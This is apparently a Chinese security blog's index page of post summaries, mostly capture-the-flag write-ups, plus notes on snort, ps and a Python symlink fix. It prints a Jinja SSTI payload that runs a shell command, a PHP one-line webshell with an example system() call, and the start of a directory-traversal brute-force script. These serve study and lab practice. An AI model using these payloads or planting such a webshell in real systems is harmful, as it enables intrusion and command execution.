爱在西元间 - 博客园

Simple_SSTI_2

摘要：先用简单的语句测试下，可以返回运算结果再执行系统命令find找到flag文件后，直接cat http://114.67.246.176:13466/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat /app/flag') 阅读全文

posted @ 2021-09-30 10:01 爱在西元间阅读(692) 评论(0) 推荐(0)

snort配置

摘要： 1、查系统所有网卡 snort.exe -W 2、监听3接口 snort.exe -i3 -v 阅读全文

posted @ 2021-09-29 13:00 爱在西元间阅读(52) 评论(0) 推荐(0)

攻防世界CTF-simple_js

摘要： 1、题目的样子，要输入密码 2、随便输了下，回车后 3、直接F12看看源码先 function dechiffre(pass_enc) { var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab = 阅读全文

posted @ 2021-09-28 16:43 爱在西元间阅读(403) 评论(0) 推荐(0)

python requests库爆破目录遍历漏洞找flag

摘要：题目的页面题目的目录遍历有一定规律，都是数字排序，而且只有两层目录 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests url = "http://challenge-cf866d8944333af5.sandbox.ctfh 阅读全文

posted @ 2021-09-27 10:02 爱在西元间阅读(277) 评论(0) 推荐(0)

php一句话马的手工利用

摘要：比如下面的一句话php <?php @eval($_POST['shell']);?> 通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件（末尾带上分号;）同样windows系统也可以执行系统命令参考：一句话木马（we 阅读全文

posted @ 2021-09-26 14:50 爱在西元间阅读(290) 评论(0) 推荐(0)

bash: /usr/bin/python3: No such file or directory

摘要： bash: /usr/bin/python3: No such file or directory 原因为/usr/bin/下无python3或软连接，用ln -s /usr/local/python3.9.7/bin/python3 /usr/bin/python3即可参考： Centos7 下阅读全文

posted @ 2021-09-02 04:28 爱在西元间阅读(5831) 评论(1) 推荐(0)

免责申明！！

摘要：本博客漏洞复现文章，渗透测试文章，仅供学习参考，请勿用于实战！！有授权情况下除外！！由于传播、利用本博客文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责。《网络产品安全漏洞管理规定》第一条为了规范网络产品安全漏洞发现、报告、修补和发布等行为，防范网络安全风险，根据《中阅读全文

posted @ 2021-09-01 15:08 爱在西元间阅读(65) 评论(0) 推荐(0)

ps aux和ps -ef的区别

摘要： ps aux可以看进程占用的cpu、mem、虚拟内存 ps -ef可以看进程的父pid 都可以看完整的command字段阅读全文

posted @ 2021-09-01 07:34 爱在西元间阅读(293) 评论(0) 推荐(0)

渗透测试工具实战技巧

摘要：渗透测试工具实战技巧合集 xiaix 2016-05-27 共32572人围观，发现13个不明物体_If you can take it, you can make it.-CSDN博客阅读全文

posted @ 2021-09-01 00:55 爱在西元间阅读(83) 评论(0) 推荐(0)

BurpSuite工具的创作团队做的一个超叼web靶场

摘要：还有Solution！！分类特别详细！参考： All labs | Web Security Academy 阅读全文

posted @ 2021-08-23 00:45 爱在西元间阅读(221) 评论(0) 推荐(0)

路漫漫其修远兮，吾将上下而求索

导航

公告